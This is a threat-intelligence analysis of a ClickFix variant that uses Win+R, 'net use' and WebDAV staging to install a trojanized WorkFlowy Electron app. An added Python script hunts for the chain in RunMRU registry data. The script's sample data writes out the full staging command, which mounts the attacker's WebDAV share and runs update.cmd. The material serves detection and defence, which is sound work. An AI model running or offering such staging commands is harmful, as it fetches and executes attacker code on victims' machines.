
ClickFix variant analysis of net use/WebDAV staging and trojanized WorkFlowy app.asar

Technical Analysis
Happening score: 19
1 unique sources, 1 articles

Summary


A new ClickFix flow uses Win+R, net use, and WebDAV to stage malware through a trojanized WorkFlowy Desktop Electron app, improving evasion against common script-based detections. The lure begins with a fake captcha page and pushes the victim to launch the command themselves, so the execution looks user-driven. The malicious logic is hidden in app.asar / main.js, where it acts as a C2 beacon and dropper. The flow matters because it bypassed Microsoft Defender for Endpoint and was only surfaced by RunMRU-based hunting.

Timeline

  1. 13.03.2026 15:28 · 2 articles

    ClickFix WebDAV staging and trojanized WorkFlowy delivery

    Technical Analysis Update

    A new ClickFix variant abuses Win+R and net use to mount a WebDAV share from 94.156.170[.]255, run update.cmd, download flowy.zip, and start a trojanized WorkFlowy Desktop 1.4.1050 Electron app. The malicious app.asar/main.js code behaves as a C2 beacon and dropper, fingerprints victims with %APPDATA%\id.txt, and was observed bypassing Microsoft Defender for Endpoint while defenders relied on RunMRU-focused threat hunting to identify the execution chain.
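The update says the chain was only surfaced by RunMRU-focused hunting. The script below is an added example (not from the report or its source) of what that triage logic can look like: it parses the Run-dialog history that Explorer keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU (single-letter values whose data ends in "\1", ordered by the MRUList value) and flags entries matching the net use / WebDAV / remote .cmd pattern described above. It assumes the key has already been exported into a Python dict (for example from a triage collection); the entries in SAMPLE_RUNMRU are constructed for the demonstration and are not real host data, apart from reusing the staging IP given in the analysis as a known indicator.

```python
"""
RunMRU triage for ClickFix-style 'net use' / WebDAV staging.

Added example: parses an exported RunMRU key and reports Win+R commands
that mount a UNC/WebDAV share, run a script from it, or chain commands.
Input is a dict of value-name -> value-data as exported from the key.
"""
import re

# Staging host named in the analysis above (used only as a match indicator).
KNOWN_STAGING_HOST = "94.156.170.255"

# UNC path, optionally with WebDAV port / @SSL suffix: \\host@80\share, \\host@SSL@443\share
UNC_RE = re.compile(r"\\\\(?P<host>[^\\@\s]+)(?:@SSL)?(?:@(?P<port>\d+))?\\", re.I)
# Script executed directly from a UNC path, e.g. \\host@80\share\update.cmd
REMOTE_SCRIPT_RE = re.compile(r"\\\\[^\s&|]+\.(?:cmd|bat)\b", re.I)

# Constructed sample export (not real host data). Explorer terminates each
# entry with "\1" and MRUList lists value names most-recent-first.
SAMPLE_RUNMRU = {
    "MRUList": "bdca",
    "a": r"notepad\1",
    "b": r"net use \\94.156.170.255@80\share && \\94.156.170.255@80\share\update.cmd\1",
    "c": r"cmd /c net use Z: \\fileserver.corp.example\share\1",
    "d": r"mstsc\1",
}


def parse_runmru(values):
    """Return Run-dialog commands in MRU order (most recent first), with the
    trailing '\\1' marker stripped from each entry."""
    commands = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        commands.append(raw[:-2] if raw.endswith("\\1") else raw)
    return commands


def classify(cmd):
    """Return the list of indicators a single Run command triggers."""
    findings = []
    lower = cmd.lower()
    unc = UNC_RE.search(cmd)

    # Mounting a remote share from the Run dialog is the core of the staging step.
    if "net use" in lower and unc:
        findings.append("net_use_unc")
    # Explicit port, @SSL or DavWWWRoot means the share is reached over WebDAV.
    if (unc and (unc.group("port") or "@ssl" in lower)) or "davwwwroot" in lower:
        findings.append("webdav_share")
    # Match against the staging host published in the analysis.
    if unc and unc.group("host").lower() == KNOWN_STAGING_HOST:
        findings.append("known_staging_host")
    # A .cmd/.bat launched straight from the share (update.cmd in the chain).
    if REMOTE_SCRIPT_RE.search(cmd):
        findings.append("remote_script_exec")
    # Command chaining inside a single Run entry is itself unusual for users.
    if "net use" in lower and any(tok in cmd for tok in ("&", "|", ";")):
        findings.append("chained_commands")
    return findings


def triage(values):
    """Return (command, findings) for every RunMRU entry with at least one
    indicator, most recent first."""
    results = []
    for cmd in parse_runmru(values):
        findings = classify(cmd)
        if findings:
            results.append((cmd, findings))
    return results


if __name__ == "__main__":
    for cmd, findings in triage(SAMPLE_RUNMRU):
        print(f"{', '.join(findings):55s} {cmd}")
```

The internal `net use Z: \\fileserver...` entry only triggers `net_use_unc`, which is why a single indicator should rank low; the staging command hits all five, and `known_staging_host` alone is enough to escalate. In a real hunt the dict comes from each user's HKU hive (including offline NTUSER.DAT files), not just the current user.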
